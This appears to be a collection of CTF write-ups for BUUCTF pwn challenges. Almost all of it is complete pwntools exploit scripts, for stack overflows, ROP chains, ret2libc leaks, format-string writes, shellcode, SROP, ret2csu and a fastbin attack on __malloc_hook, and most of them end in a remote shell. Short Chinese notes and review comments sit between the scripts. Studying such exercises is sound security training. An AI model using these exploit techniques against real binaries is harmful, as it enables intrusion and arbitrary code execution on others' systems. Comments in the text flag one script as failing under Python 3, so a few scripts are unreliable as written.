test_your_nc
pw@pwn:~/Desktop$ nc node4.buuoj.cn 29381
cat f*
flag{80bfa2c9-25ff-4f51-9376-61ee8f577d02}
rip
如果是recvuntil("please input")会超时;因为此题出的比较草率,没有考虑关闭缓冲区,"please input"加入缓冲区之后并没有满,因此继续留在缓冲区,即程序并没有输出出来,所以根本就收不到payload,自然就会超时
from pwn import *
# rip: stack buffer overflow that replaces the saved return address with a
# fixed address inside the binary. The address is hardcoded, so the target is
# presumably built without PIE; PIE or a stack canary would break this payload.
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",27963)
# 0xf bytes of buffer plus 8 more (presumably the saved rbp), then the target.
payload = b'a'*(0xf+8)+p64(0x401186)
p.sendline(payload)
p.interactive()
warmup_csaw_2016
from pwn import *
# warmup_csaw_2016: same pattern as above — 0x48 bytes of filler reach the
# saved return address, which is pointed at a fixed in-binary address
# (non-PIE assumed from the hardcoded value).
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",26496)
payload = b'a'*0x48+p64(0x40060d)
p.sendline(payload)
p.interactive()
ciscn_2019_n_1
from pwn import *
# ciscn_2019_n_1: return-address overwrite. 0x38 bytes of filler, then a fixed
# address inside the binary (non-PIE assumed); what lives at 0x4006BE is not
# visible on this page.
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",25088)
payload = b'a'*0x38+p64(0x4006BE)
p.sendline(payload)
p.interactive()
pwn1_sctf_2016
from pwn import *
# pwn1_sctf_2016 (32-bit): the 20 'I' bytes are presumably expanded by the
# program before being copied (the transform is not shown here), after which
# 4 bytes cover the saved ebp and the next 4 the return address.
context(os='linux', arch='i386', log_level='debug')
p = remote("node4.buuoj.cn",25080)
payload = b'I'*20+b'aaaa'+p32(0x8048F0D)
p.sendline(payload)
p.interactive()
jarvisoj_level0
from pwn import *
# jarvisoj_level0: return-address overwrite after 0x88 bytes of filler; the
# target is a fixed in-binary address (non-PIE assumed).
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",28851)
payload = b'a'*0x88+p64(0x400596)
p.sendline(payload)
p.interactive()
[第五空间2019 决赛]PWN5
from pwn import *
# [第五空间2019 决赛]PWN5: format-string write. The payload starts with a
# target address and then "%10$n", which stores the number of bytes printed so
# far (4, the length of the packed address) into the 10th stack argument —
# i.e. into 0x804C044. The '4' sent next is presumably the value the program
# then compares against (the check itself is not visible here). Passing user
# input as a printf format string is the root cause; -Wformat-security and a
# literal format string prevent it.
context(os='linux', arch='i386', log_level='debug')
p = remote("node4.buuoj.cn",25223)
payload = p32(0x804C044)+b"%10$n"
p.sendlineafter("your name:",payload)
p.sendline(b'4')
p.interactive()
答案不唯一,也可以用%s泄露地址上的值等等
ciscn_2019_c_1
from pwn import *
# ciscn_2019_c_1: two-stage ret2libc.
#   Stage 1 leaks puts@got by calling puts(puts@got) through the PLT and then
#   returns into encrypt for a second overflow.
#   Stage 2 computes libc's base from the leak and calls system("/bin/sh").
# This works because the GOT is readable and the libc offsets below match the
# remote libc exactly; ASLR is defeated only by the leak, not bypassed.
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",28882)
p.sendlineafter("Input your choice!\n",b'1')
# Gadgets: a bare `ret` (presumably for 16-byte stack alignment before system)
# and `pop rdi; ret` to load the first argument.
ret = 0x00000000004006b9
rdi = 0x0000000000400c83
elf = ELF('./ciscn_2019_c_1')
libc = ELF('./libc-2.27.so')
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
encrypt = elf.symbols['encrypt']
# 0x58 bytes of filler, then puts(puts_got) and return into encrypt.
payload = b'a'*0x58 + p64(rdi) +p64(puts_got) +p64(puts_plt) +p64(encrypt)
p.sendlineafter("Input your Plaintext to be encrypted\n",payload)
# Read up to the 0x7f byte that ends a userspace libc pointer, keep the last
# 6 bytes and zero-pad to 8 before unpacking.
puts = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
libc_base = puts - libc.symbols['puts']
system = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))
payload = b'a'*0x58 + p64(ret)+ p64(rdi) +p64(binsh) +p64(system)
p.sendlineafter("Input your Plaintext to be encrypted\n",payload)
p.interactive()
ciscn_2019_n_8
from pwn import *
# ciscn_2019_n_8: no control-flow hijack — 52 bytes of filler followed by the
# 8-byte value 0x11 appear to overwrite a variable the program checks (the
# comparison is not visible on this page).
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",25108)
p.sendline(b"aaaa"*13 + p64(0x11))
p.interactive()
qword全称是Quad Word。2个字节就是1个Word(1个字,16位),q就是英文quad-这个词根(意思是4)的首字母,所以它自然是word(2字节,0~2^16-1)的四倍,即8字节
jarvisoj_level2
from pwn import *
# jarvisoj_level2 (32-bit): classic 32-bit call frame on the stack — after the
# filler comes the call target (0x8048320), a dummy return address (1) and one
# argument (0x804A024). Which function and string those addresses denote is
# not shown here.
context(os='linux', arch='i386', log_level='debug')
p = remote("node4.buuoj.cn",26152)
payload = b'a'*(0x88+4)+p32(0x8048320)+p32(1)+p32(0x804A024)
p.sendline(payload)
p.interactive()
bjdctf_2020_babystack
from pwn import *
# bjdctf_2020_babystack: the first answer ('9999') is presumably the length
# the program then reads, letting the second input overflow the 0x18-byte
# buffer and overwrite the return address.
# NOTE(review): context says arch='i386' but the script packs a 64-bit address
# with p64(); harmless here since p64()/p32() are explicit and no asm() is
# used, but the arch should be 'amd64' for consistency.
context(os='linux', arch='i386', log_level='debug')
p = remote("node4.buuoj.cn",25465)
p.sendlineafter("name:\n",b'9999')
payload = b'a'*0x18 +p64(0x4006E6)
p.sendlineafter("?\n",payload)
p.interactive()
get_started_3dsctf_2016
from pwn import *
# get_started_3dsctf_2016 (32-bit): return into the function at 0x80489A0 with
# exit as its return address and two constant arguments. Per the author's
# notes below, output is only flushed when the process exits cleanly, which is
# why the chain ends in exit rather than letting it crash.
context(os='linux', arch='i386', log_level='debug')
p = remote("node4.buuoj.cn",27759)
elf = ELF('./g')
exit_addr = elf.symbols['exit']
payload = b'a'*0x38 +p32(0x80489A0)+p32(exit_addr)+p32(0x308CD64F)+p32(0x195719D1)
p.sendline(payload)
# Print whatever the target returns; there is no interactive shell here.
print(p.recv())
(1):没有push ebp,
(2):程序如果没有从exit(0)退出,就不能够回显
jarvisoj_level2_x64
from pwn import *
# jarvisoj_level2_x64: 64-bit variant — arguments go in registers, so the
# chain is `pop rdi; ret` (0x4006b3), the argument (0x600A90), then the call
# target (0x4004c0). Which function/string these are is not visible here.
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",28789)
payload = b'a'*0x88 +p64(0x00000000004006b3)+p64(0x600A90)+p64(0x4004c0)
p.sendlineafter("Input:\n",payload)
p.interactive()
[OGeek2019]babyrop
from pwn import *
# [OGeek2019]babyrop (32-bit): ret2libc with a puts leak.
# NOTE(review): context says arch='amd64' but every address is packed with
# p32() and the libc is a 32-bit build; harmless since no asm() is used, but
# 'i386' would be the consistent value.
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",25703)
elf = ELF('./i')
libc = ELF('./libc-2.23-32')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
# First input: a leading NUL byte followed by 0xff bytes. Presumably the NUL
# satisfies a string comparison while the 0xff byte is later used as a length
# (the author's note below says the read does not stop at NUL).
payload = b"\x00" +b'\xff'*7
p.sendline(payload)
# Stage 1: puts(puts_got) with 0x80487D0 as the return address, then leak.
payload = b'a'*(0xe7+4)+p32(puts_plt)+p32(0x80487D0)+p32(puts_got)+p32(0xff)
p.sendline(payload)
p.recvline()
puts = u32(p.recv(4))
print(hex(puts))
libc_base = puts - libc.symbols['puts']
system = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))
# Stage 2: system("/bin/sh") with a dummy return address of 0.
payload = b'a'*(0xe7+4)+p32(system)+p32(0)+p32(binsh)
p.sendline(payload)
p.interactive()
read遇到‘\x00’还会接收后面的字符
[HarekazeCTF2019]baby_rop
from pwn import *
# [HarekazeCTF2019]baby_rop: 0x18 bytes of filler, then four in-binary
# addresses. From the layout they look like a bare `ret` (0x400479, alignment),
# a `pop rdi; ret` (0x400683), an argument (0x601048) and a call target
# (0x400490) — none of these is verifiable on this page.
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",27901)
payload = b'b'*0x18 +p64(0x400479)+p64(0x400683)+p64(0x601048)+p64(0x400490)
p.sendline(payload)
p.interactive()
ciscn_2019_en_2
和ciscn_2019_c_1一样,
ciscn_2019_n_5
from pwn import *
# ciscn_2019_n_5: ret2shellcode. Shellcode is stored through the "name" prompt
# and the second input overflows into the return address, which is pointed at
# a fixed address (presumably the name buffer). This only works when that
# region is executable — NX alone would stop it.
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",26076)
# asm()/shellcraft depend on the context arch set above.
shellcode = asm(shellcraft.sh())
p.sendlineafter("tell me your name\n",shellcode)
payload = b'a'*0x28 +p64(0x601080)
p.sendlineafter("What do you want to say to me?\n",payload)
p.interactive()
not_the_same_3dsctf_2016
from pwn import *
# not_the_same_3dsctf_2016 (32-bit): call the function at 0x080489A0 first
# (presumably it fills a buffer at 0x080ECA2D), then write(1, 0x080ECA2D, 45)
# with exit as write's return address so the process terminates cleanly.
context(os='linux', arch='i386', log_level='debug')
p = remote("node4.buuoj.cn",29524)
elf = ELF('./c')
write = elf.sym['write']
exit = elf.sym['exit']
payload = b'a'*0x2d+p32(0x080489A0)+p32(write)+p32(exit)+p32(1)+p32(0x080ECA2D)+p32(45)
p.sendline(payload)
p.interactive()
others_shellcode
nc即可
ciscn_2019_ne_5
from pwn import *
# ciscn_2019_ne_5 (32-bit): log in, store an overlong "info" record whose tail
# is a 32-bit call frame (target 0x80484d0, dummy return 0x80484e0, one
# argument 0x080482ea), then pick menu option 4, which presumably copies the
# record into a smaller stack buffer and triggers the overflow.
context(os='linux', arch='i386', log_level='debug')
p = remote("node4.buuoj.cn",28690)
p.sendlineafter(":",b"administrator")
p.sendlineafter(":",b"1")
payload = b'a'*(0x48+4)+p32(0x80484d0)+p32(0x80484e0)+p32(0x080482ea)
p.sendlineafter("info:",payload)
p.sendlineafter(":",b"4")
p.interactive()
铁人三项(第五赛区)_2018_rop
from pwn import *
# 铁人三项(第五赛区)_2018_rop (32-bit): ret2libc with a write() leak.
# Stage 1 calls write(1, write@got, 0x30) and returns into the vulnerable
# function; stage 2 calls system("/bin/sh") from the computed libc base.
context(os='linux', arch='i386', log_level='debug')
p = remote("node4.buuoj.cn",28930)
elf = ELF('./f')
libc= ELF('./libc-2.27-23')
write_plt = elf.plt['write']
write_got = elf.got['write']
vulnerable_function = elf.sym['vulnerable_function']
payload = b'a'*0x8c +p32(write_plt)+p32(vulnerable_function)+p32(1)+p32(write_got)+p32(0x30)
p.sendline(payload)
# The first 4 bytes written back are write's resolved libc address.
write = u32(p.recv(4))
print(hex(write))
libc_base = write - libc.symbols['write']
system = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))
payload = b'a'*0x8c +p32(system)+p32(0)+p32(binsh)
p.sendline(payload)
p.interactive()
bjdctf_2020_babyrop
from pwn import *
# bjdctf_2020_babyrop: 64-bit ret2libc with a puts leak, same structure as
# ciscn_2019_c_1 above (pop rdi gadget, puts(puts@got), return into vuln).
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",29257)
elf = ELF('./g')
libc= ELF('./libc-2.23-64')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
rdi = 0x400733
vuln = elf.sym['vuln']
payload = b'a'*0x28 +p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(vuln)
p.sendline(payload)
# Keep the last 6 bytes up to the 0x7f terminator of the leaked pointer.
puts = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
print(hex(puts))
libc_base = puts - libc.symbols['puts']
system = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))
payload = b'a'*0x28 +p64(rdi)+p64(binsh)+p64(system)
p.sendline(payload)
p.interactive()
bjdctf_2020_babystack2
from pwn import *
# bjdctf_2020_babystack2: the '-1' answer presumably passes a signed length
# check while being treated as a huge unsigned size by the read (the check is
# not visible here); the second input then overwrites the return address.
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",25117)
p.sendlineafter(':\n',b'-1')
payload = b'z'*0x18 +p64(0x400726)
p.sendlineafter("?\n",payload)
p.interactive()
jarvisoj_fm
from pwn import *
# jarvisoj_fm: format-string write, same idea as PWN5 above — "%11$n" stores
# the 4 bytes printed so far into the address placed at stack argument 11.
# NOTE(review): arch='amd64' but the address is packed with p32(); harmless
# because no asm() is used, but 'i386' would be consistent.
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",27004)
payload = p32(0x804A02C) + b"%11$n"
p.sendline(payload)
p.interactive()
ciscn_2019_es_2
from pwn import *
# ciscn_2019_es_2 (32-bit): stack pivot via leave;ret.
# Step 1 fills the buffer with exactly 0x28 bytes (send, no newline) so the
# echo that follows also prints the saved ebp right after it.
# Step 2 builds a fake frame inside the same buffer and swaps ebp for an
# address inside it, so the function's own leave;ret executes the frame.
context(os='linux', arch='i386', log_level='debug')
p = remote("node4.buuoj.cn",27445)
leave_ret = 0x080484b8
p.sendafter("?\n",b'a'*0x28)
p.recvuntil(b'a'*0x28)
old_ebp = u32(p.recv(4))
print(hex(old_ebp))
# Frame layout: 4 dummy bytes (popped by leave), call target 0x8048400, a
# dummy return, the argument pointing at the "/bin/sh" that follows.
payload = b'a'*4 +p32(0x8048400)+p32(0)+p32(old_ebp-0x28)+b'/bin/sh\x00'
# Pad to 0x28, then new ebp (points into our buffer) and leave;ret to pivot.
payload = payload.ljust(0x28,b'a') + p32(old_ebp-0x38)+p32(leave_ret)
p.send(payload)
p.interactive()
leave : mov esp, ebp ; pop ebp
ret : pop eip
jarvisoj_tell_me_something
from pwn import *
# jarvisoj_tell_me_something: return-address overwrite after 0x88 bytes; the
# author's note below records that the target function has no push rbp, which
# is why the offset is not 0x88+8.
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",29032)
payload = b'a'*0x88 +p64(0x400620)
p.sendlineafter(":\n",payload)
p.interactive()
没有push rsp
[HarekazeCTF2019]baby_rop2
from pwn import *
# [HarekazeCTF2019]baby_rop2: ret2libc where the leak is done with printf.
# Stage 1: printf(0x400790, read@got) — rdi via `pop rdi`, rsi via
# `pop rsi; pop r15` (r15 gets a dummy 0) — then return into main.
# Stage 2: system("/bin/sh").
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",29750)
libc = ELF('./libc-2.23-64')
elf =ELF('./h')
rdi = 0x400733
rsi_r15 = 0x400731
main = elf.sym['main']
printf_plt = elf.plt['printf']
# NOTE(review): despite its name this holds read@got, and the libc base below
# is correctly computed from libc's `read` symbol. The author's note says the
# real printf@got did not work; a name like read_got would avoid confusion.
printf_got = elf.got['read']
payload = b'a'*0x28 +p64(rdi) +p64(0x400790) +p64(rsi_r15)+p64(printf_got)+p64(0) +p64(printf_plt)+p64(main)
p.sendlineafter('? ',payload)
read = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
print(hex(read))
libc_base = read - libc.symbols['read']
system = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))
payload = b'a'*0x28 + p64(rdi) +p64(binsh)+p64(system)
p.sendlineafter('? ',payload)
p.interactive()
有点坑,printf_got 没有成功,不知道为什么?
pwn2_sctf_2016
from pwn import *
# pwn2_sctf_2016 (32-bit): ret2libc with a printf leak. The '-1' answer
# presumably bypasses a signed length check (not visible here).
context(os='linux', arch='i386', log_level='debug')
p = remote("node4.buuoj.cn",25073)
libc = ELF('./libc-2.23-32')
elf =ELF('./a')
printf_plt = elf.plt['printf']
printf_got = elf.got['printf']
vuln = elf.sym['vuln']
p.sendlineafter("? ",b'-1')
# Stage 1: printf(printf@got) with vuln as the return address.
payload = b'a'*0x30 +p32(printf_plt)+p32(vuln) +p32(printf_got)
p.sendlineafter("data!\n",payload)
# Drain the echoed input before reading the 4 leaked bytes.
p.recv()
printf = u32(p.recv(4))
print(hex(printf))
libc_base = printf - libc.symbols['printf']
system = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))
p.sendlineafter("? ",b'-1')
# Dummy return address 0x1223344 is chosen to contain no NUL byte: per the
# author's note below, the program reads with getchar() and stops at '\x00'.
payload = b'a'*0x30 +p32(system)+p32(0x1223344)+p32(binsh)
p.sendlineafter("data!\n",payload)
p.interactive()
有点意思的是程序用的是getchar()函数,遇到"\x00"就会截止,所以第三十七行的返回地址不能含有"\x00",不然接收不到binsh就截止了
但是read居然接收"\x00"而没有截止
jarvisoj_level3(ret2libc)
from pwn import *
# jarvisoj_level3 (32-bit): ret2libc with a write() leak of read@got.
context(os='linux', arch='i386', log_level='debug')
p = remote("node4.buuoj.cn",28898)
libc = ELF('./libc-2.23-32')
elf =ELF('./b')
write_plt = elf.plt['write']
# NOTE(review): misnamed — this is read@got, and the libc base below is
# (correctly) derived from libc's `read`. Likewise `printf` a few lines down
# holds the leaked read address. Renaming both would make the script clearer.
write_got = elf.got['read']
vuln = elf.sym['vulnerable_function']
# Stage 1: write(1, read@got, 0x20), return into vulnerable_function.
payload = b'a'*0x8c +p32(write_plt)+p32(vuln) +p32(1)+p32(write_got)+p32(0x20)
p.sendlineafter("Input:\n",payload)
printf = u32(p.recv(4))
print(hex(printf))
libc_base = printf - libc.symbols['read']
system = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))
# 0x1223344 is a NUL-free dummy return address (see the getchar note above).
payload = b'a'*0x8c +p32(system)+p32(0x1223344)+p32(binsh)
p.sendlineafter("Input:\n",payload)
p.interactive()
ciscn_2019_s_3(ret2scu,SROP)
from pwn import *
# ciscn_2019_s_3, ret2csu variant. The binary is statically small (no libc
# leak needed): a stack address is leaked first, the "/bin/sh" string and a
# pointer to a `mov eax, 0x3b` stub are kept in the overflowed buffer, and the
# __libc_csu_init gadgets are used to call through that pointer.
io = remote("node4.buuoj.cn",29843)
elf = ELF('./c')
context.log_level = 'debug'
# csu_rear: pop rbx/rbp/r12-r15; ret.  csu_front: mov rdx,r15; mov rsi,r14;
# mov edi,r13d; call [r12+rbx*8] (standard __libc_csu_init gadget pair —
# inferred from how csu() below fills the registers).
csu_rear = 0x40059A
csu_front = 0x400580
vuln_addr = elf.sym['vuln']
rdi = 0x4005A3
execve_ret = 0x04004E2
syscall = 0x0400517
# Leak: 16 bytes of data, then return into vuln so the overflow can be reused.
payload_leak = ( b'/bin/sh\x00') + ( b'A' * 8 ) + p64(vuln_addr)
io.sendline(payload_leak)
# Skip 0x20 bytes of echoed output; the next 8 bytes are a stack pointer.
recv = io.recv(0x20)
stack_addr = u64(io.recv(8))
# Distance from the leaked pointer to our buffer (empirical, per the author).
binsh_addr = stack_addr - 0x118
# binsh_addr+0x10 is where csu() stores p64(execve_ret), so this is the
# pointer the csu_front gadget dereferences (see the author's note below).
execve = binsh_addr + 0x10
def csu( rbx , rbp , r12 , r13 , r14 , r15 ):
    """Send the second-stage ret2csu payload with the given register values.

    Layout: "/bin/sh" + padding + pointer-to-stub (at buffer+0x10), then the
    csu pop gadget loading rbx..r15, the csu call gadget, 0x38 bytes consumed
    by the gadget's trailing pops, and finally pop rdi -> "/bin/sh" -> syscall.
    Relies on the module-level execve_ret, csu_rear, csu_front, rdi,
    binsh_addr, syscall and io.
    """
    payload = b'/bin/sh\x00' + b'A'*0x8 + p64(execve_ret)
    payload += p64(csu_rear)
    payload += p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15)
    payload += p64(csu_front)
    payload += b'A' * 0x38
    payload += p64(rdi)
    payload += p64(binsh_addr)
    payload += p64(syscall)
    io.send(payload)
# rbx=0, rbp=1 (so the gadget's rbx+1==rbp check passes), r12 = pointer to the
# stub; r13/r14/r15 (edi/rsi/rdx) zeroed.
csu( 0 , 1 , execve , 0 , 0 , 0 )
io.interactive()
为什么execve = binsh_addr + 0x10 要加0x10 因为binsh_addr + 0x10是mov eax 0x3b 放到r12上去call
https://www.cnblogs.com/bhxdn/p/12715671.html
from pwn import *
# ciscn_2019_s_3, SROP variant: leak a stack address, then return into
# `mov eax, 0xf` + syscall (rt_sigreturn) with a forged sigreturn frame that
# lands in execve("/bin/sh", 0, 0).
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",29843)
elf = ELF('./c')
vuln = elf.sym['vuln']
mov_eax = 0x4004DA
# rdi is defined but not used in this script.
rdi =0x4005a3
syscall = 0x400517
# '\00' is an octal escape for the NUL byte, same as '\x00'.
payload = b'/bin/sh\00'*2+p64(vuln)
p.sendline(payload)
recv =p.recv(0x20)
binsh = u64(p.recv(8))
binsh = binsh - 0x118
print(hex(binsh))
# SigreturnFrame() uses the context arch set above (amd64).
frame = SigreturnFrame()
frame.rax = 0x3b
frame.rdi = binsh
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall
# NOTE(review): '/bin/sh\x00' here is a str while p64() returns bytes, so on
# Python 3 this line raises TypeError, and str(frame) does not yield the
# frame's raw bytes there either. The rest of the page uses b'' literals, so
# this block appears to have been run under Python 2.
payload ='/bin/sh\x00' +p64(0) +p64(mov_eax)+p64(syscall)+str(frame)
p.sendline(payload)
p.interactive()
还是SROP简单些
picoctf_2018_rop chain
from pwn import *
# picoctf_2018_rop chain (32-bit): three in-binary call targets chained with
# two constant arguments at the end. The functions behind 0x80485CB /
# 0x080485D8 / 0x0804862B are not shown on this page.
# NOTE(review): arch='amd64' but all values are packed with p32(); harmless
# without asm(), but 'i386' would be consistent.
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",26156)
payload = b'a'*0x1c+p32(0x80485CB)+p32(0x080485D8)+p32(0x0804862B)+p32(0xBAAAAAAD)+p32(0xDEADBAAD)
p.sendline(payload)
p.interactive()
babyheap_0ctf_2017
from pwn import *
# babyheap_0ctf_2017: run locally against ./a with the matching glibc 2.23
# build; offsets below are specific to that libc.
context(os='linux', arch='amd64', log_level='debug')
p =process('./a')
libc =ELF('/home/pw/pwn_tools/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so')
def d():
    """Debug helper: attach gdb to the target and pause (not called below)."""
    gdb.attach(p)
    pause()
def add(size):
    """Menu option 1: allocate a chunk of `size` bytes."""
    p.sendlineafter(": ",b'1')
    p.sendlineafter(": ",str(size))
def edit(index,content):
    """Menu option 2: write `content` into chunk `index`.

    The length sent is len(content), so a content longer than the chunk's
    allocation is what produces the heap overflow used below.
    """
    p.sendlineafter(": ",b'2')
    p.sendlineafter(": ",str(index))
    p.sendlineafter(": ",str(len(content)))
    p.sendlineafter("Content: ",content)
def free(index):
    """Menu option 3: free chunk `index`."""
    p.sendlineafter(": ",b'3')
    p.sendlineafter(": ",str(index))
def show(index):
    """Menu option 4: print the contents of chunk `index`."""
    p.sendlineafter(": ",b'4')
    p.sendlineafter(":",str(index))
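# Phase 1 — libc leak through overlapping chunks.
# Four 0x80-byte requests (0x90 with header, i.e. above the fastbin range).
add(0x80) #0
add(0x80) #1
add(0x80) #2
add(0x80) #3
free(1)
# Overflow from chunk 0 into chunk 1's size field: the freed chunk now claims
# 0x120 bytes, so the 0x110 request presumably receives a chunk that overlaps
# chunk 2.
edit(0,b'a'*0x88+p64(0x121))
add(0x110)
# Restore chunk 2's size header through the overlapping chunk, then free it:
# its fd/bk now point into main_arena and are readable via show(1).
edit(1,b'a'*0x88+p64(0x91))
free(2)
show(1)
unsortbin = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
print(hex(unsortbin))
# Offsets per the author's notes at the end of the page: unsorted bin head is
# main_arena+0x58 and main_arena is __malloc_hook+0x10 on this libc.
malloc_hook = unsortbin -0x58 -0x10
print(hex(malloc_hook))
libc_base = malloc_hook - libc.symbols['__malloc_hook']
# Offset of an execve gadget in this libc build (value taken from the page).
execve = libc_base + 0x4525a
# Phase 2 — fastbin corruption to get a chunk on top of __malloc_hook.
add(0x80) #2
add(0x10) #4
add(0x60) #5 # must be between 0x59 and 0x68; this size decides the fake chunk's size
free(5)
# Overflow from chunk 4 into the freed chunk 5: rewrite its size and point its
# fd at malloc_hook-0x23.
edit(4,b'a'*0x18+p64(0x61)+p64(malloc_hook-0x23))  # the size field at malloc_hook-0x23 reads as 0x7f
add(0x60) #5
add(0x60) #6
# Chunk 6 is the fake chunk; 0x13 bytes of filler put the write on __malloc_hook.
edit(6,b'a'*0x13+p64(execve))
# The next allocation goes through the hook. (glibc >= 2.34 has no malloc
# hooks; the unbounded edit() is the defect a fix would address.)
add(0x10)
p.interactive()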
malloc ==> __malloc_hook ==> addr...
unsortbin_addr = main_arena + 0x58
main_arena = __malloc_hook +0x10
__malloc_hook = unsortbin -0x58 -0x10
From: https://www.cnblogs.com/zIxyd/p/17538089.html